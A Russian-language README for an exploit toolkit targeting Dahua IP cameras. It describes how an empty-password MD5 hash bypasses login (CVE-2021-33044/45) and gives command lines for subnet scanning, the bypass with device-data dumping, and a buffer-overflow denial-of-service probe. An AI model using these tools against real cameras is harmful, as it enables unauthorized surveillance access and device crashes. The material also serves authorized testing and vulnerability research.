
Набор инструментов для исследования уязвимостей IP-камер Dahua (CVE-2021-33044/33045, CVE-2025-31700/31701)
⚠️ В РАЗРАБОТКЕ — Эти сценарии основаны на опубликованных деталях CVE и требуют дальнейшего тестирования на уязвимых устройствах для подтверждения полной функциональности.
Исследовательские и proof-of-concept скрипты для четырех критических уязвимостей IP-камер Dahua.
ДАННОЕ ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ ПРЕДОСТАВЛЯЕТСЯ ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЕЙ И АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ.
Используя эти инструменты, вы соглашаетесь с тем, что:
1. У вас есть ЯВНОЕ ПИСЬМЕННОЕ РАЗРЕШЕНИЕ на тестирование целевых систем
2. Вы НЕ будете использовать эти инструменты для незаконной деятельности
3. Вы принимаете на себя полную ответственность за свои действия
4. Авторы НЕ несут ответственности за любое неправомерное использование или ущерб
Несанкционированный доступ к компьютерным системам является УГОЛОВНЫМ ПРЕСТУПЛЕНИЕМ в большинстве юрисдикций.
Камеры Dahua используют аутентификацию по принципу «запрос-ответ» через /RPC2_Login:
Обычный вход:
step1 = MD5("admin:realm:PASSWORD")
step2 = MD5("step1:random:step1")
Обход (CVE-2021-33044/45):
step1 = MD5("admin:realm:") ← ПУСТОЙ пароль
step2 = MD5("step1:random:step1")
Уязвимая прошивка принимает хэш с пустым паролем и возвращает действительный токен сессии.
# Клонирование репозитория
git clone https://github.com/umair-aziz025/Dahua_IP_Camera_CVE_Exploit.git
cd Dahua_IP_Camera_CVE_Exploit
# Установка зависимостей
pip install requests
# Сканирование подсети (необходимы порты)
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 8081
# Один хост с портом
python dahua_scanner.py 192.168.1.100:8081
# Полные опции
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 -w 100 -t 10 -v -o results.json
# Показать справку
python dahua_scanner.py --help
Типичные порты Dahua: 80, 8000, 8080, 8081, 8888, 9000, 443, 37777
python dahua_exploit.py 192.168.1.100 -p 8081
python dahua_exploit.py 192.168.1.100 -c 2021-33044 # Один CVE
python dahua_exploit.py --help
python dahua_auth_bypass.py 192.168.1.100 -p 8081
python dahua_auth_bypass.py 192.168.1.100 --dump # Сбор информации об устройстве после обхода
python dahua_rce.py 192.168.1.100 -p 8081
python dahua_rce.py 192.168.1.100 --cve http # Только HTTP
python dahua_rce.py 192.168.1.100 --cve tcp # Только TCP/37777
⚠️ ПРЕДУПРЕЖДЕНИЕ: Скрипт DoS может вызвать сбой целевого устройства.
requests
Все остальные импорты из стандартной библиотеки Python:
socket, struct, hashlib, threading, ipaddress, argparse, json
🚧 В АКТИВНОЙ РАЗРАБОТКЕ
Эти сценарии разработаны на основе:
Статус тестирования:
Если у вас есть доступ к уязвимым устройствам для тестирования, приветствуются вклады и отзывы.
Пожалуйста, сообщайте о любых проблемах или ложных срабатываниях.
Лицензия MIT — см. файл LICENSE.
Umair Aziz
GitHub: @umair-aziz025
Только для образовательных целей и авторизованного исследования безопасности.
| CVE | CVSS | Тип | Статус |
|---|
| CVE-2021-33044 | 9.8 CRITICAL | Обход аутентификации | CISA KEV (активно эксплуатируется) |
| CVE-2021-33045 | 9.8 CRITICAL | Обход аутентификации | CISA KEV (активно эксплуатируется) |
| CVE-2025-31700 | 8.1 HIGH | Отказ в обслуживании (переполнение буфера) | Недавняя (2025) |
| CVE-2025-31701 | 8.1 HIGH | Отказ в обслуживании (переполнение буфера) | Недавняя (2025) |
| Файл | Назначение | CVE |
|---|
dahua_scanner.py | Обнаружение в сети — поиск камер Dahua в подсети | Обнаружение |
dahua_exploit.py | Много-CVE сканер — тестирование всех уязвимостей | Все |
dahua_auth_bypass.py | Выделенный обход аутентификации с опцией --dump | CVE-2021-33044/45 |
dahua_rce.py | Зонд отказа в обслуживании (переполнение буфера) | CVE-2025-31700/01 |